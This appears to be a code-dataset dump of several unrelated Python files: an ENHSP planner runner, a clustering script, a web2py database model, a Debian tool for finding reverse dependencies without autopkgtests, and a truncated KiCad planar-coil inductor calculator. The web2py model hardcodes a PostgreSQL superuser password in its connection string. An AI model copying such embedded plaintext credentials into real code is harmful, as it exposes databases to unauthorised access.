show_output (bool): whether to display the enhsp full\n output on console or not at the\n end of the run.\n (default False)\n \n Returns:\n flag (int): codes the success of the run\n \"\"\"\n\n hw_flag = data_util.hw_flag\n gw_flag = data_util.gw_flag\n delta_val_flag = data_util.delta_val_flag\n delta_exec_flag = data_util.delta_exec_flag\n frm_result = \"\"\n flag = 0\n gh_str = \"H_VALUE: \" + str(h_val) + \"\\nG_VALUE: \" + str(g_val) + \"\\n\"\n run_output_file.write(gh_str)\n \n print(\"Running \" + problem_full + \" gw: \" +str(g_val) + \" hw: \" + str(h_val))\n with subprocess.Popen([engine_path, \"-o\", domain_full, \"-f\", problem_full,\n hw_flag, str(h_val), gw_flag, str(g_val),\n delta_val_flag, str(delta), delta_exec_flag, str(delta)\n ], stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True, preexec_fn=os.setsid) as result:\n try:\n res, err = result.communicate(timeout=run_time)\n if result.returncode:\n raise subprocess.CalledProcessError(cmd=result.args, returncode=result.returncode)\n \n except (subprocess.TimeoutExpired):\n ### A group of processes is generated in order to kill the java subprocesses\n ### spawned in turn by enhsp (they'd remain zombies and eat computational resources\n ### otherwise in case of a run interrupted by timeout\n group_pid = os.getpgid(result.pid)\n os.killpg(group_pid, signal.SIGINT)\n ###\n fail_str = 'Solution not found for ' + problem_full + 'in ' + str(run_time) + ' seconds'\n print(fail_str)\n \n except (subprocess.CalledProcessError):\n fail_str = 'Error found during the solution of ' + problem_full\n print(fail_str)\n print(err.replace('\\\\n', '\\n'))\n \n else:\n flag = 1\n frm_result = res.replace('\\\\n','\\n')\n frm_result = res.replace(data_util.duration_alias, 'Duration')\n frm_result = trim_output(frm_result)\n \n if show_output:\n print(res.replace('\\\\n','\\n'))\n \n run_output_file.write(\"SUCCESS: \" + str(flag) + \"\\n\")\n run_output_file.write(frm_result)\n \n run_output_file.write(\"\\n\\n### ------------------ ###\\n\\n\")\n return flag\n \ndef trim_output(tot_out):\n \"\"\"\n This functions keeps only the metrics we are interested in\n from the enhsp output log\n \n Args:\n tot_out (str): enhsp whole log of a succesful run\n \n Returns:\n trim_out (str): trimmed log presenting only the metrics\n of interested (those in 'output_keywords')\n \"\"\"\n \n trim_out = \"\"\n \n for k in output_keywords:\n start = tot_out.rfind(k)\n # rfind simply retrieves the last time the string appeared\n # necessary since States Evaluated appears more than once\n # in different contextes\n end = tot_out.find(\"\\n\", start, -1) + 1\n trim_out = trim_out + tot_out[start:end]\n \n return trim_out\n \ndef get_best_hg(regr_dict, problem_filename):\n \"\"\"\n This functions retrieves the best wg and wh based on\n a problem configuration\n \n Information such as number of waiters and drink\n distribution were used to train a sequence of\n LinearRegression models on two solution parameters,\n 'Duration' and 'Search Time', in order to predict\n the quality of the solution expected for each of\n the (hw,gw) couples the training was performed on.\n The (hw,gw) couple yielding the best expected\n performance (the lower weighted sum of the two predictd\n metrics) is selected.\n * Notice that the predicted values are actually the\n log() of those two solution parameters.\n \n Args:\n regr_dict (dict):\n collection of all LinearRegression\n models trained, indexed as\n (hw,gw)x(goal_metric)\n problem_filename (str):\n path/to/problem_file to run\n \n Returns:\n [hw] (list(float)):\n optimal predicted h weight (returned as\n a singleton list for compatibility)\n [gw] (list(float)):\n optimal predicted g weight (returned as\n a singleton list for compatibility)\n \"\"\"\n \n best_out = float('inf')\n ## Parse problem file\n n_waiters, drink4table, hot4table = parse.parse_problem(problem_filename)\n \n tot, avg_x, avg_y, eig_1, eig_2 = data_util.avg_drink_pos(drink4table)\n hot_tot, hot_avg_x, hot_avg_y, hot_eig_1, hot_eig_2 = data_util.avg_drink_pos(hot4table)\n \n params = [n_waiters, tot, avg_x, avg_y, eig_1, eig_2, hot_tot, hot_avg_x, hot_avg_y, hot_eig_1, hot_eig_2]\n ## Apply linear regression coefficien to estimate the Y function for all (h,g) values\n \n ## load already explored drinks configurations\n goals = data_util.regr_goals_\n Q_weights = data_util.Q_weights_\n \n pred_goals = {}\n \n for hg_key, regr_list in regr_dict.items():\n exp_out = list()\n for goal, regr in regr_list.items():\n prediction = regr.predict([params])\n pred_goals[goal] = round(math.exp(prediction))\n exp_out.append(Q_weights[goal]*prediction)\n ## Log scale chosen\n # exp_out.append(Q_weights[goal]*pred_goals[goal])\n \n Q_fact = sum(exp_out)/sum(Q_weights.values())\n print(\"[H: {:6}\\tG: {:6}]\\t->Q: {}\\t{}\".format(hg_key[0], hg_key[1], Q_fact, pred_goals))\n \n if Q_fact < best_out:\n best_out = Q_fact\n h_val = hg_key[0]\n g_val = hg_key[1]\n \n print(\"Chosen [H: {}\\tG: {}]\".format(h_val, g_val))\n return [h_val], [g_val]\n\ndef main(argv):\n \"\"\"\n Script to run a (domain, problem) file using enhsp solver.\n \n It's possible to run them using the couple of (hw,gw)\n autonomously predicted to have the better results\n (among a finite list of such couples) thanks to a small\n machine learning model.\n \"\"\"\n \n usage = (\"usage: pyhton3 \" + argv[0] + \"\\n\" +\n \"(default values will be used in case options are not provided)\\n\" +\n \"\\t-f, --problem \\tPDDL problem file\\n\" +\n \"\\t-n, --output-path \\tpath and name of the output file\\n\" +\n \"\\t-o, --domain \\tPDDL domain file\\n\" +\n \"\\t-p, --path \\tpath to directory of PDDL files\\n\" +\n \"\\t-t, --time \\tmaximum run time of each instance, in seconds\\n\" +\n \"\\t-s, --silence\\don't print output of each run on the terminal\\n\" +\n \"\\t-M, --machine-learning \\t\\tautomatically find close-to-optimal [hw,gw]\\n\"+\n \"\\t\\t\\t\\t\\t values with trained Linear Regression model\\n\" +\n \"\\t--gw \\t\\tthe list of gw values as [gw1,gw2,gw3,...] (list)\\n\" +\n \"\\t--hw \\t\\tthe list of hw values as [hw1,hw2,hw3,...] (list)\\n\" +\n \"\\t-h, --help\\t\\tdisplay this help\\n\"\n )\n usr_wd = \"\"\n Pddl_domain = Pddl_domain_\n Pddl_problem = Pddl_problem_\n output_string = \"\"\n run_time = None ## None won't trigger a timeout\n ML = False\n show_output = True\n g_values = [1.0]\n h_values = [1.0]\n \n try:\n opts, args = getopt.getopt(argv[1:], \"hf:o:p:n:t:Ms\",\n [\"help\", \"problem=\", \"domain=\", \"path=\", \"output-path=\", \"time=\",\n \"gw=\", \"hw=\", \"machine-learning\", \"silence\"])\n except getopt.GetoptError:\n print(usage)\n sys.exit(1)\n \n \n if (\"-M\", '') in opts or (\"--machine-learning\", '') in opts:\n ML = True\n \n for opt, arg in opts:\n if opt in (\"-h\", \"--help\"):\n print(usage)\n sys.exit()\n elif opt in (\"-f\", \"--problem\"):\n Pddl_problem = arg\n elif opt in (\"-o\", \"--domain\"):\n Pddl_domain = arg\n elif opt in (\"-p\", \"--path\"):\n usr_wd = arg+\"/\"\n elif opt in (\"-n\", \"--output-path\"):\n output_string = arg\n elif opt in (\"-t\", \"--time\"):\n run_time = int(arg)\n elif opt in (\"-s\", \"--silence\"):\n show_output = False\n elif not ML and opt in (\"--gw\") and arg[0] == '[' and arg[-1] == ']':\n gw = re.findall(\"\\d+\\.?\\d*\", arg)\n g_values = list()\n try:\n for gg in gw:\n g_values.append(float(gg))\n except ValueError:\n print(\"g values should be float\")\n sys.exit()\n elif not ML and opt in (\"--hw\") and arg[0] == '[' and arg[-1] == ']':\n hw = re.findall(\"\\d+\\.?\\d*\", arg)\n h_values = list()\n try:\n for hh in hw:\n h_values.append(float(hh))\n except ValueError:\n print(\"h values should be float\")\n sys.exit()\n \n domain_string = usr_wd + Pddl_domain\n problem_string = usr_wd + Pddl_problem\n \n problem_trim_name = Pddl_problem[Pddl_problem.rfind(\"/\")+1:Pddl_problem.rfind(\".pddl\")]\n \n if not output_string:\n output_string = \"output_\" + problem_trim_name + \".txt\"\n \n \n if ML:\n ## load saved Linear Regression\n try:\n with open(regr_name_full_, 'rb') as f:\n regr_dict = pickle.load(f)\n h_values, g_values = get_best_hg(regr_dict, problem_string)\n \n except FileNotFoundError:\n #pass #in this case do nothing, explored_cases is already an empty list\n print(\"No regression model found at {}, default hw and gw will be used\".format(regr_name_full))\n print(\"To generate it run first\\n\" +\n \"\\tpython3 correlation.py -c \\n\")\n \n h_values = [1.0]\n g_values = [1.0] \n \n with open(cwd + \"/\" + out_wd + \"/\"+ output_string, \"w\") as run_output_file:\n for g_value in g_values:\n for h_value in h_values:\n if h_value == g_value != 1:\n continue\n run_script = run(domain_string, problem_string, g_value, h_value,\n run_output_file, run_time=run_time, show_output = show_output)\n res_run_str = problem_trim_name + \" with hw = \" + str(h_value) + \" gw = \" + str(g_value)\n if run_script:\n print(\"Succesful run \" + res_run_str)\n else:\n print(\"Unsuccesful run \" + res_run_str)\n \n\nif __name__ == '__main__':\n main(sys.argv)\n","repo_name":"hypothe/AI4RO2_E","sub_path":"script/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":12715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39055920333","text":"#!/usr/bin/python3\n# 8-multiple_returns.py\n\ndef multiple_returns(sentence):\n \"\"\"get length of sentence and first character\"\"\"\n first_char = None\n length = len(sentence)\n if length > 0:\n first_char = sentence[0]\n return length, first_char\n","repo_name":"stephenoba/alx-higher_level_programming","sub_path":"0x03-python-data_structures/8-multiple_returns.py","file_name":"8-multiple_returns.py","file_ext":"py","file_size_in_byte":260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28546176412","text":"from sklearn import datasets\r\nfrom sklearn.cluster import KMeans\r\nfrom sklearn.mixture import GaussianMixture\r\nfrom sklearn.decomposition import PCA, FastICA\r\nfrom sklearn.random_projection import GaussianRandomProjection\r\nfrom sklearn.metrics import silhouette_score\r\nfrom sklearn.metrics.cluster import completeness_score, homogeneity_score\r\nfrom sklearn.model_selection import learning_curve\r\nfrom sklearn import preprocessing\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\nimport csv\r\nfrom getData import getData\r\nimport utils\r\nimport sys, getopt\r\nimport time\r\nfrom clusters import run_Kmeans, plot_Kmeans, overplot_Kmeans, run_GMM, plot_GMM, overplot_GMM, plot_clusters, p1_Keamns, print_mertrics\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\r\n\tbaseline = False\r\n\tsingle = False\r\n\tprintFlg = False\r\n\tALGS = []\r\n\tCLUSTERS = []\r\n\r\n\tfor i in range(len(sys.argv)):\r\n\t\tif sys.argv[i] == '-single':\r\n\t\t\tsingle = True\r\n\t\tif sys.argv[i] == '-baseline':\r\n\t\t\tbaseline = True\r\n\t\tif sys.argv[i] == '-c':\r\n\t\t\tif sys.argv[i+1] == 'all':\r\n\t\t\t\tCLUSTERS = [0, 1, 2]\r\n\t\t\tif sys.argv[i+1] == 'kmeans':\r\n\t\t\t\tCLUSTERS = [0]\r\n\t\t\telif sys.argv[i+1] == 'gmm':\r\n\t\t\t\tCLUSTERS = [1]\r\n\t\tif sys.argv[i] == '-d':\r\n\t\t\tif sys.argv[i+1] == 'all':\r\n\t\t\t\tDATASETS = [0, 1]\r\n\t\t\tif sys.argv[i+1] == 'wine':\r\n\t\t\t\tDATASETS = [0]\r\n\t\t\telif sys.argv[i+1] == 'cancer':\r\n\t\t\t\tDATASETS = [1]\r\n\t\tif sys.argv[i] == '-print_metrics':\r\n\t\t\tprintFlg = True\r\n\r\n\r\n\r\n\r\n\t# get data\r\n\tx_wine, y_wine = getData.wineData()\r\n\tx_wine = preprocessing.scale(x_wine)\r\n\tfeature_space_wine = np.array(range(2,np.shape(x_wine)[1]+1))\r\n\r\n\tx_cancer, y_cancer = getData.cancerData()\r\n\tx_cancer = preprocessing.scale(x_cancer)\r\n\tfeature_space_cancer = np.array(range(2,np.shape(x_cancer)[1]+1))\r\n\r\n\tfor clust in CLUSTERS:\r\n\t\tif clust == 0:\r\n\t\t\tfor dat in DATASETS:\r\n\t\t\t\tif dat == 0:\r\n\t\t\t\t\tp1_Keamns(x_wine, y_wine, 'KMeans Wine Analysis', 'KMeans_Wine_Analysis', \r\n\t\t\t\t\t\tkRange=feature_space_wine, verbose=False)\r\n\t\t\t\t\tprint_mertrics(x_wine, y_wine, [7], alg='Kmeans')\r\n\r\n\t\t\t\tif dat == 1:\r\n\t\t\t\t\tp1_Keamns(x_cancer, y_cancer, 'KMeans Cancer Analysis', 'KMeans_Cancer_Analysis', \r\n\t\t\t\t\t\tkRange=feature_space_cancer, verbose=False)\r\n\t\tif clust == 1:\r\n\t\t\tfor dat in DATASETS:\r\n\t\t\t\tif dat == 0:\r\n\t\t\t\t\tgmmOut = run_GMM(x_wine, y_wine, kRange=feature_space_wine, verbose=True)\r\n\t\t\t\t\tgmm, n, aic_scores, bic_scores = gmmOut\r\n\t\t\t\t\tplot_GMM(n, aic_scores, bic_scores, 'GMM Wine Analysis', 'GMMs_Wine_Analysis')\r\n\r\n\t\t\t\tif dat == 1:\r\n\t\t\t\t\tgmmOut = run_GMM(x_cancer, y_cancer, kRange=feature_space_cancer, verbose=True)\r\n\t\t\t\t\tgmm, n, aic_scores, bic_scores = gmmOut\r\n\t\t\t\t\tplot_GMM(n, aic_scores, bic_scores, 'GMM Cancer Analysis', 'GMMs_Cancer_Analysis')\r\n\r\n\r\n\tif printFlg:\r\n\t\t# print_mertrics(x_wine, y_wine, [feature_space_wine[-1]], alg='Kmeans')\r\n\t\tprint_mertrics(x_wine, y_wine, [7], alg='Kmeans')\r\n\t\t# print_mertrics(x_cancer, y_cancer, [feature_space_cancer[-1]], alg='Kmeans')\r\n\t\tprint_mertrics(x_cancer, y_cancer, [6], alg='Kmeans')\r\n\r\n\t\t# print_mertrics(x_wine, y_wine, [feature_space_wine[-1]], alg='GMM')\r\n\t\tprint_mertrics(x_wine, y_wine, [7], alg='GMM')\r\n\t\t# print_mertrics(x_cancer, y_cancer, [feature_space_cancer[-1]], alg='GMM')\r\n\t\tprint_mertrics(x_cancer, y_cancer, [7], alg='GMM')","repo_name":"ajscott0613/CS7641_ML_P3","sub_path":"runClusters.py","file_name":"runClusters.py","file_ext":"py","file_size_in_byte":3237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71567455848","text":"# -*- coding: utf-8 -*-\n\nfrom gluon.tools import Auth, Crud, Service, PluginManager, prettydate\n\n\ndb = DAL(\"postgres://postgres:Please123@localhost/joseph\",\n pool_size=10,\n check_reserved=['postgres'],)\n # migrate=True, fake_migrate=True, lazy_tables=True)\n\ndb.define_table('image',\n Field('title', unique=True),\n Field('file', 'upload'),\n format = '%(title)s')\n\ndb.define_table('post',\n Field('image_id', 'reference image'),\n Field('author'),\n Field('email'),\n Field('body', 'text'))\n\n\n# db.define_table('grids',\n# Field('image_id'),\n# Field('author'),\n# Field('email'),\n# Field('body', 'text'))\n\ndb.define_table('simap_grids',\n Field('name', 'string', unique=True),\n Field('description', 'text'), \n Field('abbreviation', 'string'),\n Field('filename', 'string'),\n Field('source_dirs', 'list:string'),\n Field('sha1', 'string'),\n Field('project', 'string'), \n Field('origin', 'string'), # This will be spatial type Point\n Field('delta', 'string'), # This will be spatial type Point\n Field('extent', 'string'), # This will be spatial type Polygon\n Field('habitat_id'), # This will be a foreign key to habitats.id\n Field('scenario_id'), # This will be a foreign key to scenarios.id\n format='%(name)s'\n )\n\n\n\n\ndb.image.title.requires = IS_NOT_IN_DB(db, db.image.title)\n\ndb.post.image_id.requires = IS_IN_DB(db, db.image.id, '%(title)s')\ndb.post.author.requires = IS_NOT_EMPTY()\ndb.post.email.requires = IS_EMAIL()\ndb.post.body.requires = IS_NOT_EMPTY()\ndb.post.image_id.writable = db.post.image_id.readable = False\n\n\n## configure auth policy\nauth = Auth(db)\nauth.define_tables(username=True)\nauth.settings.registration_requires_verification = False\nauth.settings.registration_requires_approval = False\nauth.settings.reset_password_requires_verification = True","repo_name":"gjcoombes/joseph","sub_path":"models/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":1965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36949241412","text":"import argparse\nimport pathlib\nimport subprocess\nimport sys\n\nimport debian.deb822 as d822\nfrom rich.console import Console\nfrom rich.progress import track\n\nconsole = Console()\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--package', default=None)\nparser.add_argument('--bts-user', default=None)\nparser.add_argument('--bts-tag', default=None)\nparser.add_argument('--debemail', default=\"YOUR NAME \")\n\nargs = parser.parse_args()\nif args.package is None:\n console.print(\"[red]ERROR: please specify the package to check\\n\")\n parser.print_help(sys.stderr)\n sys.exit(1)\nif args.bts_user is None:\n console.print(\"[red]ERROR: please specify the BTS username to use\\n\")\n parser.print_help(sys.stderr)\n sys.exit(1)\nif args.bts_tag is None:\n args.bts_tag = f'missing-adt-{args.package}'\n\nMASSBUG_BODY = f\"\"\"Dear maintainer,\n#PACKAGE# has a package relationship with {args.package} (either a\nDepends/Recommends/Suggests or a build-time dependency) but doesn't defineany\nautopkgtests.\n\nAutopkgtests allow for automation to verify reverse-dependencies are still\nworking and/or building properly after a package is uploaded, and are helpful\nin preventing a package from migrating to testing if they break other packages.\n\nFor these reasons, please add \"meaningful\" autopkgtests to this package, which\nusually means running the upstream unittests.\n\nFurther information can be found at:\n\n * https://manpages.debian.org/unstable/autopkgtest/autopkgtest.1.en.html\n * https://manpages.debian.org/unstable/dh-python/pybuild-autopkgtest.1.en.html\n\n\nThanks!\n\nPackage list generated by:\n\n https://github.com/sandrotosi/debian-tools/blob/master/find_rdeps_without_autopkgtests.py\n\"\"\"\n\n# it's quite hard to find all the source and binary packages having a relationship with PKG, so take the `apt-rdepends` approximation here\nrdeps = subprocess.run(['apt-rdepends', '-r', '--follow=Obsoletes', args.package], stdout=subprocess.PIPE, stderr=subprocess.PIPE).stdout.decode()\nrdeps = [x.split()[2] for x in rdeps.splitlines() if x.startswith(' Reverse Depends')]\n\nok, ko = set(), set()\n\nfor rdep in track(rdeps, description=\"Processing rdeps...\"):\n aptcache = subprocess.run(['apt-cache', 'showsrc', rdep], stdout=subprocess.PIPE, stderr=subprocess.PIPE).stdout.decode()\n data = d822.Deb822(aptcache)\n if 'Testsuite' in data:\n ok.add(data['Package'])\n else:\n ko.add(data['Package'])\n\nconsole.print(\"Summary:\")\nconsole.print(f\" Total rdeps processed: {len(rdeps)}\")\nconsole.print(f\" Total rdeps with autopkgtests: [green]{len(ok)}\")\nconsole.print(f\" Total rdeps [underline]without[/underline] autopkgtests: [red]{len(ko)}\")\n\n\nconsole.print(\"rdeps with autopkgtests\")\nfor pkg in sorted(ok):\n console.print(f\" {pkg}\", style=\"green\")\nconsole.print(\"rdeps WITHOUT autopkgtests\")\nfor pkg in sorted(ko):\n console.print(f\" {pkg}\", style=\"red\")\n\npkgs_filename = f'{args.package}_pkgs'\nbody_filename = f'{args.package}_body'\n\npathlib.Path(pkgs_filename).open('w').write('\\n'.join(sorted(ko)))\npathlib.Path(body_filename).open('w').write(MASSBUG_BODY)\n\nconsole.print(\"\\nA set of 2 files have been generated in the current directory:\")\nconsole.print(f\" - the bug report template body: {body_filename}\")\nconsole.print(f\" - the packages list: {pkgs_filename}\\n\")\n\nconsole.print(\"You can now run `mass-bug` to file the bug reports:\\n\")\nprint(f' DEBEMAIL=\"{args.debemail}\" mass-bug --subject=\"please add autopkgtests (to add coverage for {args.package})\" --user={args.bts_user} --usertags={args.bts_tag} --source --no-wrap --severity=normal {body_filename} {pkgs_filename}')\nconsole.print(\"\\nNOTE: to actually submit the reports, append `--send` to the command above\")\n","repo_name":"sandrotosi/debian-tools","sub_path":"find_rdeps_without_autopkgtests.py","file_name":"find_rdeps_without_autopkgtests.py","file_ext":"py","file_size_in_byte":3731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39951781744","text":"class Scikic:\n\n def __init__(self):\n # Single layer Planar spiral coil inductor calculator\n # See: the square planar inductor at\n # http://www.circuits.dk/calculator_planar_coil_inductor.htm\n #\n # Note: units of length are millimetres (mm)\n #\n # n, number of turns or windings, N>=2\n # dint, inner dimension\n # s, gap or spacing between windings\n # w, conductor width\n # h, conductor height or thickness, hidden in Figure 1 of the paper.\n\n # dimension associated with the via: Size X: 0.6, Size y: 0.6; Hole shape = circular, Hole Size: 0.3\n # See: https://jlcpcb.com/capabilities/Capabilities\n self.via_hole_diam = 0.3 # minimum via hole size is 0.3mm\n self.via_size_x = 0.6 # minimum Via diameter is 0.6mm\n self.via_size_y = 0.6 # minimum Via diameter is 0.6mm\n # Fasthenry parameters\n self.nwinc: int = 1 # see Fasthenry manual\n self.nhinc: int = 1\n\n self.parseCommandLineArgs()\n\n def getXYPositions(self):\n # din = inner length\n # w = track width\n # s = spacing between tracks\n # number of turns\n\n din = self.din\n w = self.w\n s = self.s\n n = self.n\n\n x = [0 for _ in range(4 * n)]\n\n for i in range(len(x)):\n dv, md = divmod(i, 4)\n if md == 3:\n x[i] = -(din / 2 + dv * (w + s) + w / 2)\n x[i - 2] = - x[i]\n if md == 0:\n x[i] = (w + s) / 2\n y = x[1:] + [0]\n\n return x, y\n\n def getLengths(self):\n\n din = self.din\n w = self.w\n s = self.s\n n = self.n\n l = [0 for _ in range(int((4 * n) / 2))]\n count = 1\n for i in range(len(l)):\n l[i] = din + count * w + (count - 2) * (s)\n count += 1\n\n return l\n\n def getStartEndCoords(self):\n\n din = self.din\n w = self.w\n s = self.s\n n = self.n\n x, y = self.getXYPositions()\n x0y0 = []\n for i in range(len(x)):\n x0y0.append(par.Point(x[i], y[i]))\n x0y0[i].slide_xy(-(w + s) / 4.0, 0.0)\n nodes = []\n base_width = din + w - s\n widths = []\n nodes = []\n for i in range(2 * n):\n widths.append(base_width + i * (w + s))\n nodes = []\n for i in range(0, len(x0y0), 2):\n # print('width of side {:>2} is {:.3f} @ ({:.3f},{:.3f})]'.format(i+1,widths[int(i/2)], x0y0[i].x, x0y0[i].y))\n p = x0y0[i].clone()\n p.slide_xy(-widths[int(i / 2)] / 2 + w / 2, 0)\n q = x0y0[i].clone()\n q.slide_xy(widths[int(i / 2)] / 2 - w / 2, 0)\n nodes.append(p)\n nodes.append(q)\n for i in range(2, len(nodes), 4):\n tmp = nodes[i]\n nodes[i] = nodes[i + 1]\n nodes[i + 1] = tmp\n\n return nodes\n\n def printNodes(self, nodes):\n print('nodes:')\n for i in range(len(nodes)):\n print('n{:>2}=({:>6.3f},{:>6.3f})'.format(i, nodes[i].x, nodes[i].y))\n\n def getEndCoords(self, length, x0):\n\n w = self.w\n return (x0 - length / 2 + w / 2), (x0 + length / 2 - w / 2)\n\n def getWidths(self, lengths, trackWidth):\n widths = []\n\n for i in range(len(lengths)):\n widths.append(lengths[i])\n widths.append(trackWidth)\n\n return widths\n\n def getHeights(self, widths):\n return widths[1:] + [widths[-2]]\n\n def formKiCadFootprint(self):\n\n din = self.din\n trackWidth = self.w\n s = self.s\n n = self.n\n via_size = self.via_size_x\n\n x, y = self.getXYPositions()\n l = self.getLengths()\n widths = self.getWidths(l, trackWidth)\n heights = self.getHeights(widths)\n footprint = textwrap.dedent(\"\"\"\\\n\t\t\t(module mohan (layer F.Cu) (tedit 5E1D9573)\n\t\t\t (fp_text reference REF** (at 0 0) (layer F.SilkS)\n\t\t\t\t(effects (font (size 1 1) (thickness 0.15)))\n\t\t\t )\n\t\t\t (fp_text value mohan (at 0 0) (layer F.Fab)\n\t\t\t\t(effects (font (size 1 1) (thickness 0.15)))\n\t\t\t )\t\t\t\n\t\t\"\"\")\n\n line_txt = ' (pad {} smd rect (at {:.3f} {:.3f}) (size {:.3f} {:.3f}) (layers F.Cu F.Paste F.Mask))\\n'\n\n for i in range(len(x)):\n footprint += line_txt.format(i + 3, x[i], y[i], widths[i], heights[i])\n\n l1 = din - s + trackWidth\n p = x[0] - l1 / 2\n q = -(din / 2 + n * trackWidth + (n - 1) * s) + trackWidth / 2\n pad = ' (pad {} thru_hole rect (at {:.3f} {:.3f})(size {} {}) (drill 0.3)(layers *.Cu))\\n'\n footprint += pad.format(1, p + via_size / 2, y[0] - via_size / 2, via_size, via_size)\n footprint += pad.format(2, q - via_size / 2 + trackWidth / 2, -q + trackWidth / 2 + via_size / 4,\n via_size, via_size)\n line_txt = ' (fp_line (start {:.3f} {:.3f}) (end {:.3f} {:.3f}) (layer F.CrtYd) (width 0.12))\\n'\n q = (2 * n * trackWidth + 2 * (n - 1) * s + din) / 2 + s + via_size # basis for corner coordinates\n footprint += line_txt.format(-q, -q, q, -q)\n footprint += line_txt.format(q, -q, q, q)\n footprint += line_txt.format(q, q, -q, q)\n footprint += line_txt.format(-q, q, -q, -q)\n line_txt = ' (fp_line (start {:.3f} {:.3f}) (end {:.3f} {:.3f}) (layer F.SilkS) (width 0.12))\\n'\n footprint += line_txt.format(-q, -q, q, -q)\n footprint += line_txt.format(q, -q, q, q)\n footprint += line_txt.format(q, q, -q, q)\n footprint += line_txt.format(-q, q, -q, -q)\n footprint += \\\n '(fp_text user \"din={:.3f} dout={:.3f} n={} w={:.3f} s={:.3f} L={}H rho={:.3f}\" (at 0 {})(layer Cmts.User) (effects(font(size 1 1)(thickness 0.15))))\\n'.format(\n self.din,\n self.dout,\n self.n,\n self.w,\n self.s,\n EngNumber(self.inductance, precision=3),\n self.rho,\n q + 1)\n footprint += \")\\n\"\n\n return footprint\n\n def calculateInductance(self):\n a = [1.62e-3, -1.21, -0.147, 2.40, 1.78, -0.030] # values from Table III of paper.\n b = a[0]\n\n din = self.din * 1000\n dout = self.dout * 1000\n davg = np.divide((dout + din), 2)\n w = self.w * 1000\n n = self.n\n s = self.s * 1000\n # Monomial Expression\n lmon = np.multiply(b, np.power(dout, a[1]))\n lmon = np.multiply(lmon, np.power(w, a[2]))\n lmon = np.multiply(lmon, np.power(davg, a[3]))\n lmon = np.multiply(lmon, np.power(n, a[4]))\n lmon = np.multiply(lmon, np.power(s, a[5]))\n\n # Modified Wheeler\n k1 = 2.34\n k2 = 2.75\n rho = self.rho\n u = 4e-7 * np.pi\n lmw = np.multiply(u, np.power(n, 2))\n lmw = np.multiply(lmw, k1)\n lmw = np.multiply(lmw, davg)\n lmw = np.divide(lmw, (1 + np.multiply(k2, rho)))\n lmw = np.multiply(lmw, 1e3)\n\n # current sheet\n c1 = 1.27\n c2 = 2.07\n c3 = 0.18\n c4 = 0.13\n lgmd = np.multiply(u, np.power(n, 2)) # u*n^2\n lgmd = np.multiply(lgmd, davg) # u*n^2*davg\n lgmd = np.multiply(lgmd, c1) # u*n^2*davg*c1\n lgmd = np.divide(lgmd, 2) # u*n^2*davg*c1/2\n lgmd = np.multiply(lgmd, np.log(np.divide(c2, rho)) + np.multiply(c3, rho) + np.multiply(c4, np.power(rho, 2)))\n lgmd = np.multiply(lgmd, 1e3)\n\n return np.multiply(lmw, 1e-09), np.multiply(lgmd, 1e-09), np.multiply(lmon, 1e-09)\n\n def parseCommandLineArgs(self):\n\n tag = textwrap.dedent( \\\n \"\"\"\n {}{}\n \"\"\").format(\"\\\\\\\\\", \"\\\\\")\n\n examples = textwrap.dedent( \\\n \"\"\"\n examples:\n %(prog)s -N {0:>2} -Ai {4} -s {8} -g {9} -t {10}\n %(prog)s -N {1:>2} -Ai {5} -s {8} -g {9} -t {10}\n %(prog)s -N {2:>2} -Ai {6} -s {8} -g {9} -t {10}\n %(prog)s -N {3:>2} -Ai {7} -s {8} -g {9} -t {10}\n \"\"\".format(2, 5, 10, 15, 47.2, 38.8, 24.8, 10.8, 0.7, 0.7, 0.035))\n\n parser = argparse.ArgumentParser(description='KiCad PCB Footprint Utility.', \\\n epilog=examples, \\\n formatter_class=RawTextHelpFormatter)\n group_2 = parser.add_argument_group('Optimization')\n group_1 = parser.add_argument_group('Coil parameters')\n\n group_1.add_argument('-n', '--number_of_turns', help=u'number of turns or windings, n \\u2265 1', type=int,\n default=1, action='store', dest='n'),\n group_1.add_argument('-din', '--inside_dimension', help='internal dimension, mm', default=0.856, type=float,\n action='store',\n dest='din')\n group_1.add_argument('-w', '--trace_width', help='conductor width, mm', default=0.128, type=float,\n action='store', dest='w')\n group_1.add_argument('-s', '--trace_spacing', help='spacing between windings, mm', default=0.128, type=float,\n action='store',\n dest='s')\n group_1.add_argument('-t', '--trace_height', help='trace thickness or height, mm', default=0.035, type=float,\n action='store',\n dest='t')\n group_1.add_argument('-v', '--verbosity', dest='v', help='output additional results', action='store_true')\n group_1.add_argument('-f', '--footprint', dest='f', help='save kicad pcb footprint', action='store_true')\n group_2.add_argument('-o', '--optimize', help='optimize coil parameters to give the required inductance',\n default=0, type=float, action='store', dest='o')\n args = vars(parser.parse_args())\n\n self.n = args['n']\n self.din = args['din']\n self.s = args['s']\n self.w = args['w']\n self.h = args['t']\n self.o = args['o']\n self.f = args['f']\n self.v = args['v']\n\n if self.n < 1:\n print('The number of turns has to be greater than or equal to 1.')\n sys.exit(-1)\n\n if self.w < 0.128:\n print('The track width has to be greater than or equal to 0.128mm or 5mil.')\n sys.exit(-1)\n\n if self.s < 0.128:\n print('The track spacing has to be greater than or equal to 0.128mm or 5mil.')\n sys.exit(-1)\n\n if self.din < 2 * self.s + self.via_size_x:\n print(\n 'The inner dimension of the coil must be greater than {:.3f} mm.'.format(2 * self.s + self.via_size_x))\n sys.exit(-1)\n\n self.N = 4 * self.n + 1 # number of sides\n self.dout = self.din + 2 * (self.n * self.w + (self.n - 1) * self.s)\n self.rho = (self.dout - self.din) / (self.dout + self.din)\n if self.v:\n print(tag)\n print('dout = {}'.format(EngNumber(self.dout, precision=3)))\n print('n={}'.format(args['n']))\n print('din={}'.format(args['din']))\n print('s={}'.format(args['s']))\n print('w={}'.format(args['w']))\n print('t={}'.format(args['t']))\n 